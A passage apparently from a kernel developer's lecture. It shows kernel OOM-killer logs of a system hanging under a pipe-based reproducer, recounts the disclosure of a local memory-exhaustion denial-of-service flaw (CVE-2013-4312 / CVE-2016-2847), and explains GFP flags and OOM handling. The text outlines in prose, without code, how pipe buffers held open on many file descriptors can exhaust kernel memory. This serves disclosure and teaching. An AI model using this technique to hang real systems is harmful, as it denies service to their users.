gvfs-udisks2-vo [ 79.009329] [ 2871] 0 2871 92703 782 44 0 0 udisksd [ 79.010795] [ 2878] 42 2878 83626 371 91 0 0 goa-identity-se [ 79.012404] [ 2889] 42 2889 105443 307 58 0 0 gvfs-afc-volume [ 79.014295] [ 2894] 42 2894 78121 168 38 0 0 gvfs-mtp-volume [ 79.015865] [ 2898] 42 2898 74934 137 33 0 0 gvfs-goa-volume [ 79.017473] [ 2902] 42 2902 80390 182 43 0 0 gvfs-gphoto2-vo [ 79.019042] [ 2914] 0 2914 80155 236 57 0 -900 realmd [ 79.020472] [ 2922] 42 2922 79800 679 42 0 0 ibus-engine-sim [ 79.022074] [ 2976] 0 2976 36375 328 73 0 0 sshd [ 79.023483] [ 2980] 1000 2980 36408 326 70 0 0 sshd [ 79.024879] [ 2982] 1000 2982 29142 391 14 0 0 bash [ 79.026277] [ 3075] 0 3075 26974 23 10 0 0 sleep [ 79.027729] [ 3077] 1000 3077 1042 20 7 0 1 pipe-memeater2 [ 79.029291] [ 3078] 1000 3078 1042 20 7 0 1 pipe-memeater2 [ 79.030897] [ 3079] 1000 3079 1042 20 7 0 1 pipe-memeater2 [ 79.032489] [ 3080] 1000 3080 1042 20 7 0 1 pipe-memeater2 [ 79.034042] [ 3081] 1000 3081 1042 20 7 0 1 pipe-memeater2 [ 79.035603] [ 3082] 1000 3082 1042 20 7 0 1 pipe-memeater2 [ 79.037158] [ 3083] 1000 3083 1042 20 7 0 1 pipe-memeater2 [ 79.038752] [ 3084] 1000 3084 1042 20 7 0 1 pipe-memeater2 [ 79.040301] [ 3085] 1000 3085 1042 20 7 0 1 pipe-memeater2 [ 79.041855] [ 3086] 1000 3086 1042 20 7 0 1 pipe-memeater2 [ 79.043438] [ 3088] 1000 3088 1042 20 7 0 0 pipe-memeater2 [ 79.045025] Out of memory: Kill process 2770 (gnome-shell) score 37 or sacrifice child [ 79.046466] Killed process 2806 (ibus-daemon) total-vm:470000kB, anon-rss:2128kB, file-rss:4kB (Omitting repetitions) [ 119.938777] pipe-memeater2 invoked oom-killer: gfp_mask=0x200d2, order=0, oom_score_adj=0 [ 119.940307] pipe-memeater2 cpuset=/ mems_allowed=0 [ 119.941199] CPU: 0 PID: 3088 Comm: pipe-memeater2 Not tainted 3.10.0-123.el7.x86_64 #1 [ 119.942645] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013 [ 119.944575] ffff88005f302d80 000000005d69c4df ffff88005f3ada78 ffffffff815e19ba [ 119.946897] ffff88005f3adb08 ffffffff815dd02d ffffffff810b68f8 ffff8800666dde50 [ 119.948528] 0000000000000202 ffff88005f302d80 ffff88005f3adaf0 ffffffff81102eff [ 119.949989] Call Trace: [ 119.950466] [<ffffffff815e19ba>] dump_stack+0x19/0x1b [ 119.951424] [<ffffffff815dd02d>] dump_header+0x8e/0x214 [ 119.952398] [<ffffffff810b68f8>] ? ktime_get_ts+0x48/0xe0 [ 119.953413] [<ffffffff81102eff>] ? delayacct_end+0x8f/0xb0 [ 119.954435] [<ffffffff8114520e>] oom_kill_process+0x24e/0x3b0 [ 119.955514] [<ffffffff81144d76>] ? find_lock_task_mm+0x56/0xc0 [ 119.956799] [<ffffffff8106af3e>] ? has_capability_noaudit+0x1e/0x30 [ 119.957985] [<ffffffff81145a36>] out_of_memory+0x4b6/0x4f0 [ 119.958997] [<ffffffff8114b579>] __alloc_pages_nodemask+0xa09/0xb10 [ 119.960145] [<ffffffff81188779>] alloc_pages_current+0xa9/0x170 [ 119.961223] [<ffffffff811b8954>] pipe_write+0x274/0x540 [ 119.962186] [<ffffffff811af36d>] do_sync_write+0x8d/0xd0 [ 119.963159] [<ffffffff811afb0d>] vfs_write+0xbd/0x1e0 [ 119.964094] [<ffffffff811b0558>] SyS_write+0x58/0xb0 [ 119.965014] [<ffffffff815f2119>] system_call_fastpath+0x16/0x1b [ 119.966102] Mem-Info: [ 119.966528] Node 0 DMA per-cpu: [ 119.967138] CPU 0: hi: 0, btch: 1 usd: 0 [ 119.968216] CPU 1: hi: 0, btch: 1 usd: 0 [ 119.969247] CPU 2: hi: 0, btch: 1 usd: 0 [ 119.970408] CPU 3: hi: 0, btch: 1 usd: 0 [ 119.971436] Node 0 DMA32 per-cpu: [ 119.972147] CPU 0: hi: 186, btch: 31 usd: 0 [ 119.973018] CPU 1: hi: 186, btch: 31 usd: 30 [ 119.973883] CPU 2: hi: 186, btch: 31 usd: 41 [ 119.974748] CPU 3: hi: 186, btch: 31 usd: 22 [ 119.975626] active_anon:3798 inactive_anon:1649 isolated_anon:0 [ 119.975626] active_file:4 inactive_file:198 isolated_file:0 [ 119.975626] unevictable:0 dirty:0 writeback:0 unstable:0 [ 119.975626] free:13047 slab_reclaimable:4692 slab_unreclaimable:7148 [ 119.975626] mapped:0 shmem:2260 pagetables:530 bounce:0 [ 119.975626] free_cma:0 [ 119.981153] Node 0 DMA free:7632kB min:384kB low:480kB high:576kB active_anon:128kB inactive_anon:104kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:124kB slab_reclaimable:152kB slab_unreclaimable:356kB kernel_stack:0kB pagetables:8kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes [ 119.988478] lowmem_reserve[]: 0 1802 1802 1802 [ 119.989412] Node 0 DMA32 free:44612kB min:44668kB low:55832kB high:67000kB active_anon:15064kB inactive_anon:6492kB active_file:16kB inactive_file:376kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1845300kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:8916kB slab_reclaimable:18616kB slab_unreclaimable:28236kB kernel_stack:3608kB pagetables:2112kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:223 all_unreclaimable? yes [ 119.996991] lowmem_reserve[]: 0 0 0 0 [ 119.997797] Node 0 DMA: 2*4kB (UM) 8*8kB (UM) 10*16kB (M) 11*32kB (UM) 11*64kB (UM) 11*128kB (UM) 5*256kB (UM) 1*512kB (U) 1*1024kB (M) 1*2048kB (R) 0*4096kB = 7560kB [ 120.002259] Node 0 DMA32: 1143*4kB (EM) 966*8kB (UEM) 491*16kB (EM) 345*32kB (UEM) 102*64kB (EM) 23*128kB (UM) 0*256kB 0*512kB 0*1024kB 0*2048kB 1*4096kB (R) = 44764kB [ 120.007208] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 120.008837] 2506 total pagecache pages [ 120.009721] 0 pages in swap cache [ 120.010395] Swap cache stats: add 0, delete 0, find 0/0 [ 120.011755] Free swap = 0kB [ 120.012363] Total swap = 0kB [ 120.016138] 524287 pages RAM [ 120.016878] 54799 pages reserved [ 120.017911] 525985 pages shared [ 120.018652] 454436 pages non-shared [ 120.019391] [ pid ] uid tgid total_vm rss nr_ptes swapents oom_score_adj name [ 120.021231] [ 590] 0 590 29620 80 26 0 0 lvmetad [ 120.023399] [ 612] 0 612 10995 330 21 0 -1000 systemd-udevd [ 120.025409] [ 704] 0 704 12797 95 23 0 -1000 auditd [ 120.027072] [ 717] 0 717 20056 28 9 0 0 audispd [ 120.029071] [ 726] 0 726 4189 43 13 0 0 alsactl [ 120.031114] [ 729] 0 729 6600 80 17 0 0 systemd-logind [ 120.032827] [ 730] 0 730 1094 25 8 0 0 rngd [ 120.034420] [ 732] 0 732 6551 49 19 0 0 sedispatch [ 120.036194] [ 736] 81 736 7419 337 18 0 -900 dbus-daemon [ 120.037949] [ 745] 995 745 2133 37 9 0 0 lsmd [ 120.039411] [ 748] 0 748 4829 78 12 0 0 irqbalance [ 120.041107] [ 770] 172 770 41164 53 16 0 0 rtkit-daemon [ 120.042884] [ 781] 70 781 7549 76 21 0 0 avahi-daemon [ 120.045308] [ 794] 0 794 28812 62 11 0 0 ksmtuned [ 120.047005] [ 806] 70 806 7518 59 19 0 0 avahi-daemon [ 120.048535] [ 1410] 0 1410 20640 213 44 0 -1000 sshd [ 120.049944] [ 1456] 0 1456 6491 49 17 0 0 atd [ 120.051333] [ 1462] 0 1462 27509 33 11 0 0 agetty [ 120.052764] [ 2583] 0 2583 64751 493 57 0 -900 abrt-dbus [ 120.054299] [ 2705] 99 2705 3888 47 11 0 0 dnsmasq [ 120.056124] [ 2706] 0 2706 3881 45 11 0 0 dnsmasq [ 120.057652] [ 2914] 0 2914 80155 255 57 0 -900 realmd [ 120.059087] [ 3075] 0 3075 26974 23 10 0 0 sleep [ 120.060508] [ 3088] 1000 3088 1042 20 7 0 0 pipe-memeater2 [ 120.062067] [ 3089] 0 3089 2732 32 9 0 0 systemd-cgroups [ 120.063637] [ 3090] 0 3090 19084 33 10 0 0 systemd-cgroups [ 120.065210] [ 3091] 0 3091 19084 33 9 0 0 systemd-cgroups [ 120.066939] [ 3092] 0 3092 2719 27 9 0 0 systemd-cgroups [ 120.069145] Out of memory: Kill process 590 (lvmetad) score 0 or sacrifice child [ 120.071126] Killed process 590 (lvmetad) total-vm:118480kB, anon-rss:320kB, file-rss:0kB ( I pressed SysRq-m in order to display memory information, for the system was still not responding. ) [ 209.378474] SysRq : Show Memory [ 209.379117] Mem-Info: [ 209.379560] Node 0 DMA per-cpu: [ 209.380184] CPU 0: hi: 0, btch: 1 usd: 0 [ 209.381073] CPU 1: hi: 0, btch: 1 usd: 0 [ 209.381968] CPU 2: hi: 0, btch: 1 usd: 0 [ 209.382852] CPU 3: hi: 0, btch: 1 usd: 0 [ 209.383736] Node 0 DMA32 per-cpu: [ 209.384383] CPU 0: hi: 186, btch: 31 usd: 91 [ 209.385281] CPU 1: hi: 186, btch: 31 usd: 53 [ 209.386171] CPU 2: hi: 186, btch: 31 usd: 92 [ 209.387054] CPU 3: hi: 186, btch: 31 usd: 138 [ 209.387947] active_anon:3716 inactive_anon:1649 isolated_anon:0 [ 209.387947] active_file:28 inactive_file:8 isolated_file:0 [ 209.387947] unevictable:0 dirty:0 writeback:0 unstable:0 [ 209.387947] free:12757 slab_reclaimable:4692 slab_unreclaimable:7146 [ 209.387947] mapped:68 shmem:2260 pagetables:504 bounce:0 [ 209.387947] free_cma:0 [ 209.393582] Node 0 DMA free:7592kB min:384kB low:480kB high:576kB active_anon:128kB inactive_anon:104kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:124kB slab_reclaimable:152kB slab_unreclaimable:356kB kernel_stack:0kB pagetables:8kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes [ 209.400851] lowmem_reserve[]: 0 1802 1802 1802 [ 209.401815] Node 0 DMA32 free:43436kB min:44668kB low:55832kB high:67000kB active_anon:14736kB inactive_anon:6492kB active_file:112kB inactive_file:32kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1845300kB mlocked:0kB dirty:0kB writeback:0kB mapped:272kB shmem:8916kB slab_reclaimable:18616kB slab_unreclaimable:28228kB kernel_stack:3608kB pagetables:2008kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:824 all_unreclaimable? yes [ 209.409563] lowmem_reserve[]: 0 0 0 0 [ 209.410386] Node 0 DMA: 16*4kB (M) 13*8kB (UM) 10*16kB (M) 11*32kB (UM) 10*64kB (UM) 11*128kB (UM) 5*256kB (UM) 1*512kB (U) 1*1024kB (M) 1*2048kB (R) 0*4096kB = 7592kB [ 209.413721] Node 0 DMA32: 1009*4kB (EM) 937*8kB (EM) 476*16kB (UEM) 345*32kB (UEM) 103*64kB (UEM) 20*128kB (UM) 0*256kB 0*512kB 0*1024kB 0*2048kB 1*4096kB (R) = 43436kB [ 209.416997] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 209.418540] 2312 total pagecache pages [ 209.419241] 0 pages in swap cache [ 209.419859] Swap cache stats: add 0, delete 0, find 0/0 [ 209.420824] Free swap = 0kB [ 209.421370] Total swap = 0kB [ 209.424943] 524287 pages RAM [ 209.425506] 54799 pages reserved [ 209.426111] 525960 pages shared [ 209.426705] 454446 pages non-shared ( I pressed SysRq-m in order to display memory information, for the system was still not responding. ) [ 279.574636] SysRq : Show Memory [ 279.575281] Mem-Info: [ 279.575727] Node 0 DMA per-cpu: [ 279.576351] CPU 0: hi: 0, btch: 1 usd: 0 [ 279.577240] CPU 1: hi: 0, btch: 1 usd: 0 [ 279.578135] CPU 2: hi: 0, btch: 1 usd: 0 [ 279.579025] CPU 3: hi: 0, btch: 1 usd: 0 [ 279.579911] Node 0 DMA32 per-cpu: [ 279.580559] CPU 0: hi: 186, btch: 31 usd: 91 [ 279.581454] CPU 1: hi: 186, btch: 31 usd: 53 [ 279.582342] CPU 2: hi: 186, btch: 31 usd: 92 [ 279.583229] CPU 3: hi: 186, btch: 31 usd: 138 [ 279.584119] active_anon:3716 inactive_anon:1649 isolated_anon:0 [ 279.584119] active_file:28 inactive_file:8 isolated_file:0 [ 279.584119] unevictable:0 dirty:0 writeback:0 unstable:0 [ 279.584119] free:12757 slab_reclaimable:4692 slab_unreclaimable:7146 [ 279.584119] mapped:68 shmem:2260 pagetables:504 bounce:0 [ 279.584119] free_cma:0 [ 279.589776] Node 0 DMA free:7592kB min:384kB low:480kB high:576kB active_anon:128kB inactive_anon:104kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:124kB slab_reclaimable:152kB slab_unreclaimable:356kB kernel_stack:0kB pagetables:8kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes [ 279.597050] lowmem_reserve[]: 0 1802 1802 1802 [ 279.598024] Node 0 DMA32 free:43436kB min:44668kB low:55832kB high:67000kB active_anon:14736kB inactive_anon:6492kB active_file:112kB inactive_file:32kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1845300kB mlocked:0kB dirty:0kB writeback:0kB mapped:272kB shmem:8916kB slab_reclaimable:18616kB slab_unreclaimable:28228kB kernel_stack:3608kB pagetables:2008kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:824 all_unreclaimable? yes [ 279.605826] lowmem_reserve[]: 0 0 0 0 [ 279.606659] Node 0 DMA: 16*4kB (M) 13*8kB (UM) 10*16kB (M) 11*32kB (UM) 10*64kB (UM) 11*128kB (UM) 5*256kB (UM) 1*512kB (U) 1*1024kB (M) 1*2048kB (R) 0*4096kB = 7592kB [ 279.610016] Node 0 DMA32: 1009*4kB (EM) 937*8kB (EM) 476*16kB (UEM) 345*32kB (UEM) 103*64kB (UEM) 20*128kB (UM) 0*256kB 0*512kB 0*1024kB 0*2048kB 1*4096kB (R) = 43436kB [ 279.613298] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 279.614840] 2312 total pagecache pages [ 279.615539] 0 pages in swap cache [ 279.616166] Swap cache stats: add 0, delete 0, find 0/0 [ 279.617134] Free swap = 0kB [ 279.617676] Total swap = 0kB [ 279.621228] 524287 pages RAM [ 279.622185] 54799 pages reserved [ 279.622791] 525928 pages shared [ 279.623369] 454446 pages non-shared ( I pressed SysRq-f in order to invoke OOM killer, for OOM killer is not invoked automatically despite DMA32's free: is already below min: watermark. ) [ 297.411498] SysRq : Manual OOM execution [ 297.412450] kworker/0:2 invoked oom-killer: gfp_mask=0xd0, order=0, oom_score_adj=0 [ 297.413837] kworker/0:2 cpuset=/ mems_allowed=0 [ 297.414701] CPU: 0 PID: 297 Comm: kworker/0:2 Not tainted 3.10.0-123.el7.x86_64 #1 [ 297.416070] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013 [ 297.418031] Workqueue: events moom_callback [ 297.418817] ffff880036ebc440 00000000d84a44d3 ffff880036a3fc70 ffffffff815e19ba [ 297.420273] ffff880036a3fd00 ffffffff815dd02d ffff880036a3fe04 ffff880036a407d0 [ 297.421755] ffff88003689c000 0000000000000004 ffff880036a3fcc8 0000000200000000 [ 297.423197] Call Trace: [ 297.423670] [<ffffffff815e19ba>] dump_stack+0x19/0x1b [ 297.424601] [<ffffffff815dd02d>] dump_header+0x8e/0x214 [ 297.425571] [<ffffffff8114520e>] oom_kill_process+0x24e/0x3b0 [ 297.426639] [<ffffffff81144d76>] ? find_lock_task_mm+0x56/0xc0 [ 297.427744] [<ffffffff8106af3e>] ? has_capability_noaudit+0x1e/0x30 [ 297.428889] [<ffffffff81145a36>] out_of_memory+0x4b6/0x4f0 [ 297.429921] [<ffffffff8137bc3d>] moom_callback+0x4d/0x50 [ 297.430904] [<ffffffff8107e02b>] process_one_work+0x17b/0x460 [ 297.431989] [<ffffffff8107edfb>] worker_thread+0x11b/0x400 [ 297.433040] [<ffffffff8107ece0>] ? rescuer_thread+0x400/0x400 [ 297.434092] [<ffffffff81085aef>] kthread+0xcf/0xe0 [ 297.434981] [<ffffffff81085a20>] ? kthread_create_on_node+0x140/0x140 [ 297.436168] [<ffffffff815f206c>] ret_from_fork+0x7c/0xb0 [ 297.437257] [<ffffffff81085a20>] ? kthread_create_on_node+0x140/0x140 [ 297.438461] Mem-Info: [ 297.438896] Node 0 DMA per-cpu: [ 297.439510] CPU 0: hi: 0, btch: 1 usd: 0 [ 297.440405] CPU 1: hi: 0, btch: 1 usd: 0 [ 297.441288] CPU 2: hi: 0, btch: 1 usd: 0 [ 297.442171] CPU 3: hi: 0, btch: 1 usd: 0 [ 297.443056] Node 0 DMA32 per-cpu: [ 297.443701] CPU 0: hi: 186, btch: 31 usd: 91 [ 297.444590] CPU 1: hi: 186, btch: 31 usd: 53 [ 297.445473] CPU 2: hi: 186, btch: 31 usd: 92 [ 297.446358] CPU 3: hi: 186, btch: 31 usd: 138 [ 297.447242] active_anon:3716 inactive_anon:1649 isolated_anon:0 [ 297.447242] active_file:28 inactive_file:8 isolated_file:0 [ 297.447242] unevictable:0 dirty:0 writeback:0 unstable:0 [ 297.447242] free:12757 slab_reclaimable:4692 slab_unreclaimable:7146 [ 297.447242] mapped:68 shmem:2260 pagetables:504 bounce:0 [ 297.447242] free_cma:0 [ 297.453048] Node 0 DMA free:7592kB min:384kB low:480kB high:576kB active_anon:128kB inactive_anon:104kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:124kB slab_reclaimable:152kB slab_unreclaimable:356kB kernel_stack:0kB pagetables:8kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes [ 297.460221] lowmem_reserve[]: 0 1802 1802 1802 [ 297.461163] Node 0 DMA32 free:43436kB min:44668kB low:55832kB high:67000kB active_anon:14736kB inactive_anon:6492kB active_file:112kB inactive_file:32kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1845300kB mlocked:0kB dirty:0kB writeback:0kB mapped:272kB shmem:8916kB slab_reclaimable:18616kB slab_unreclaimable:28228kB kernel_stack:3608kB pagetables:2008kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:824 all_unreclaimable? yes [ 297.469732] lowmem_reserve[]: 0 0 0 0 [ 297.470565] Node 0 DMA: 16*4kB (M) 13*8kB (UM) 10*16kB (M) 11*32kB (UM) 10*64kB (UM) 11*128kB (UM) 5*256kB (UM) 1*512kB (U) 1*1024kB (M) 1*2048kB (R) 0*4096kB = 7592kB [ 297.473931] Node 0 DMA32: 1009*4kB (EM) 937*8kB (EM) 476*16kB (UEM) 345*32kB (UEM) 103*64kB (UEM) 20*128kB (UM) 0*256kB 0*512kB 0*1024kB 0*2048kB 1*4096kB (R) = 43436kB [ 297.477216] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 297.478752] 2312 total pagecache pages [ 297.479453] 0 pages in swap cache [ 297.480080] Swap cache stats: add 0, delete 0, find 0/0 [ 297.481058] Free swap = 0kB [ 297.481596] Total swap = 0kB [ 297.485061] 524287 pages RAM [ 297.485624] 54799 pages reserved [ 297.486234] 525928 pages shared [ 297.486826] 454446 pages non-shared [ 297.487486] [ pid ] uid tgid total_vm rss nr_ptes swapents oom_score_adj name [ 297.488954] [ 612] 0 612 10995 330 21 0 -1000 systemd-udevd [ 297.490531] [ 704] 0 704 12797 95 23 0 -1000 auditd [ 297.492002] [ 717] 0 717 20056 69 9 0 0 audispd [ 297.493481] [ 726] 0 726 4189 43 13 0 0 alsactl [ 297.494963] [ 729] 0 729 6600 77 17 0 0 systemd-logind [ 297.496545] [ 730] 0 730 1094 25 8 0 0 rngd [ 297.497986] [ 732] 0 732 6551 49 19 0 0 sedispatch [ 297.499506] [ 736] 81 736 7419 337 18 0 -900 dbus-daemon [ 297.501759] [ 745] 995 745 2133 37 9 0 0 lsmd [ 297.503207] [ 748] 0 748 4829 78 12 0 0 irqbalance [ 297.504741] [ 770] 172 770 41164 56 16 0 0 rtkit-daemon [ 297.506298] [ 781] 70 781 7549 76 21 0 0 avahi-daemon [ 297.507855] [ 794] 0 794 28812 62 11 0 0 ksmtuned [ 297.509361] [ 806] 70 806 7518 59 19 0 0 avahi-daemon [ 297.510917] [ 1410] 0 1410 20640 213 44 0 -1000 sshd [ 297.512358] [ 1456] 0 1456 6491 49 17 0 0 atd [ 297.513797] [ 1462] 0 1462 27509 33 11 0 0 agetty [ 297.515266] [ 2583] 0 2583 64751 493 57 0 -900 abrt-dbus [ 297.516777] [ 2705] 99 2705 3888 47 11 0 0 dnsmasq [ 297.518255] [ 2706] 0 2706 3881 45 11 0 0 dnsmasq [ 297.519756] [ 2914] 0 2914 80155 255 57 0 -900 realmd [ 297.521218] [ 3075] 0 3075 26974 23 10 0 0 sleep [ 297.522669] [ 3088] 1000 3088 1042 20 7 0 0 pipe-memeater2 [ 297.524263] [ 3089] 0 3089 2732 32 9 0 0 systemd-cgroups [ 297.525861] [ 3090] 0 3090 19084 33 10 0 0 systemd-cgroups [ 297.527466] [ 3091] 0 3091 19084 33 9 0 0 systemd-cgroups [ 297.529070] [ 3092] 0 3092 2719 27 9 0 0 systemd-cgroups [ 297.530666] Out of memory: Kill process 781 (avahi-daemon) score 0 or sacrifice child [ 297.532093] Killed process 806 (avahi-daemon) total-vm:30072kB, anon-rss:236kB, file-rss:0kB ---------- Example output of a hang up after OOM killer is invoked end ----------
At first, I was suspecting that this is a systemd related problem. But it turned out that this problem tends to occur when using xfs.
I write "SIGKILL signal cannot be ignored" at OOM killer. But to tell the truth, there are many "procedures which cannot be interrupted when SIGKILL signal is delivered" in the kernel. This is because that since the kernel is a program which controls resources between programs running in userspace and hardware, interrupting as soon as receiving SIGKILL signal can result in inconsistent state.
In order to avoid inconsistent state, there are many "(unkillable) procedures which cannot be interrupted when SIGKILL signal is delivered" in the kernel. But actually, there are also many "(essentially killable) procedures which can be interrupted when SIGKILL signal is delivered, but they remain unkillable in order to simplify procedures by eliminating error handling".
Although I demonstrated that a problematic behavior that a system hangs up using this vulnerability, this vulnerability was not taken seriously, and what I got are responses like "Your system is already DoS attacked and it is too late to recover. Give up and restart your system."
Also, since this vulnerability is considered as a topic which should be discussed in public mailing lists, the discussion moved to public mailing lists on November, 2014.
Since I am not good at doing discussions, I made relevant people angry for many times.
It is not a good thing to post a reproducer program which exploits not yet fixed vulnerabilities in order to demonstrate that the system hangs up in public mailing lists. Also, it is possible that reproducing the hang up using this vulnerability lead to a conditioned response like "Your system is already DoS attacked and it is too late to recover."
Therefore, I posted many reproducer programs developed by trial and error which do not exploit this vulnerability. Also, I put a constraint that a local unprivileged user can reproduce the hang up with finite stress, in order to distinguish that this is different from simple overloading which puts stress forever and to demonstrate that this hang up can occur in actual systems.
But, the discussion spreaded too widely since this attempt discovered too many problems. Therefore, I'd like to explain the ending of this vulnerability.
In the end of 2015, patches which mitigates this vulnerability were proposed to public mailing list, and this vulnerability went public. Then, the patches were merged into Linux 4.5 (which was released in March 2016).
But since I gave "Mitigates: CVE-2013-4312 (Linux 2.0+)" tag to both patches posted almost the same time, there was a confusion. As a result, an attack which exhausts all file descriptors using Unix domain sockets (which was discussed without assigning CVE number) became CVE-2013-4312, and an attack which exhausts all kernel memory using pipe's buffers (which was discussed as CVE-2013-4312) became CVE-2016-2847.
Anyway, the file descriptor exhaustion attack was solved, and the kernel memory exhaustion attack was to some degree mitigated.
In May 2016, I noticed that a patch for tracking memory for pipe's buffer using kmemcg was (again) posted to public mailing lists. (I didn't notice that the first post was September 2015.)
"Huh? Wasn't memory used for pipe's buffer already tracked using kmemcg since Linux 3.8? We had been discussing this vulnerability based on that assumption."
Thus, I asked the author of the patch and got a reply: "Only memory for pipe's metadata was tracked using kmemcg. Memory for pipe's buffer (anonymous pipe buffer pages) was never tracked until now."
··· Wow! It turned out that the kmemcg which was assumed to be the mitigation of this vulnerability was hardly effective. Therefore, regarding this vulnerability, "unless resources are appropriately restricted using memory cgroup" disclaimer did not hold true.
Now, (finally?) I'd like to get to the main point of this lecture.
A data structure for managing processes/threads.
A data structure for managing signals.
A data structure for managing memory used by processes which run in userspace.
Single process / single thread
Multi processes. Can be created by fork().
Honest multi threads. Can be created by clone() with CLONE_VM and CLONE_SIGHAND and CLONE_THREAD.
Twisted multi threads. Can be created by clone() with CLONE_VM but without CLONE_SIGHAND.
Basically does not have mm_struct.
Queues implemented by kernel threads (for processing works issued by various threads).
Using "page" which is 4096 bytes as a base, and managing using "order" as index for grouping in the power of 2 sizes like order-0 (for 1 byte to 4096 bytes), order-1 (for 4097 bytes to 8192 bytes), order-2 (for 8193 bytes to 16384 bytes) ···.
There is slab allocator for managing small fixed sized allocation requests, but I don't explain it because it is not important for this lecture.
The OOM killer does not take memory associated with file descriptors into account, and takes only memory associated with mm_struct into account.
This assumes that majority of memory is associated with mm_struct. Therefore, if the system got an attack which consumes all memory as pipe's buffer using many file descriptors, the OOM killer resulted in killing most of innocent processes one by one.
The kmemcg which in memory cgroup functionality can track memory used inside the kernel. Normal memory cgroup (which is not kmemcg) tracks memory associated with mm_struct.
When requesting for free memory, the requester specifies a bitmask called GFP flags. This bitmask controls what actions are possible for making free memory (e.g. reclaiming memory used for caching purpose) and how hard the kernel should try to reclaim memory. This is a world where memory allocation requests in userspace (e.g. malloc()) does not recognize.
GFP_KERNEL (__GFP_RECLAIM | __GFP_IO | __GFP_FS) | Used by mainly applications (contractors). If needed, the kernel can perform fs writeback (reflecting changes for file systems) operations using __GFP_FS flag and/or storage I/O (read/write) operations using __GFP_IO flags. |
GFP_NOFS (__GFP_RECLAIM | __GFP_IO) | Used by mainly filesystems (subcontractors). If needed, the kernel can perform storage I/O operations using __GFP_IO flags. But in order to avoid deadlocks, the kernel cannot perform fs writeback operations. |
GFP_NOIO (__GFP_RECLAIM) | Used by mainly device drivers (sub-sub contractors). In order to avoid deadlocks, the kernel cannot perform fs writeback operations nor storage I/O operations. |
For example, if __GFP_FS flag (which allows the kernel to perform fs writeback operations) is by error specified at memory allocation requests which occur with locks for filesystem held, there is a possibility of deadlock.
Also, no messages are printed when deadlock actually occurred. It just looks that the system got unexplained hung up.
Since nobody actively tests the behavior of out of memory. the error handling paths for memory allocation failure are hardly tested. Therefore, we can observe various strange behaviors if we intentionally make memory allocation requests to fail.
If such memory allocation request is absolutely necessary, the kernel will invoke the OOM killer by specifying __GFP_NOFAIL flag. But since there is risk of terminating majority of processes due to fragmentation of memory, vmalloc() which can allow large memory allocation requests at the cost of some performance penalty is commonly used for large memory allocation requests instead of specifying __GFP_NOFAIL.
There might be memory which can be reclaimed if fs writeback operation is performed (i.e. GFP_KERNEL). Therefore, in order to avoid killing processes prematurely, the kernel does not invoke the OOM killer unless __GFP_FS flag or __GFP_NOFAIL flag is specified.
Killing a process means that working state is lost. Since the OOM killer reclaims memory by killing processes, it is expected that the OOM killer does not kill processes more than needed. Therefore, the kernel uses TIF_MEMDIE flag for indicating that "this process was terminated by the OOM killer".
The kernel shows two exceptional behavior by setting TIF_MEMDIE flag to processes.
Step 1: Before OOM situation occurs |
Step 2: Immediately after OOM situation occurred |
Step 3: The OOM killer kills a process |
Step 4: Survive OOM situation by allocating from "memory reserves" |
Step 5: Process releases mm_struct |
Step 6: After OOM situation is resolved |
When an application performs asynchronous write requests to a file, the content to be written is cached onto memory allocated by GFP_KERNEL allocation requests. Then, periodically or as needed basis, the content is reflected to filesystems using memory allocated by GFP_NOFS allocation requests. And, when reflecting changes to filesystems, storage I/O operation is performed using memory allocated by GFP_NOIO allocation requests.
This means that, in order to satisfy GFP_KERNEL allocation requests (contractors' requests), GFP_NOFS allocation requests (subcontractors' requests) need to be satisfied. And, in order to satisfy GFP_NOFS allocation requests (subcontractors' requests), GFP_NOIO allocation requests (sub-sub contractors' requests) need to be satisfied.
But all allocation requests use same watermark (the value of min: level). In other words, when GFP_KERNEL allocation requests cannot be satisfied, GFP_NOFS and GFP_NOIO allocation requests cannot be satisfied as well.
That is, if the kernel does not want to invoke the OOM killer for allocation requests from GFP_NOFS (subcontractors) and GFP_NOIO (sub-sub contractors), the kernel has no choice other than denying such allocation requests (i.e. fail such allocation requests), doesn't it?
But failing storage I/O due to failing sub-sub contractor's memory allocation results in a damage to subcontractors (filesystem inconsistency). For example, if ext4 filesystem encounters such failure, the filesystem will be remounted read-only or trigger a kernel panic.
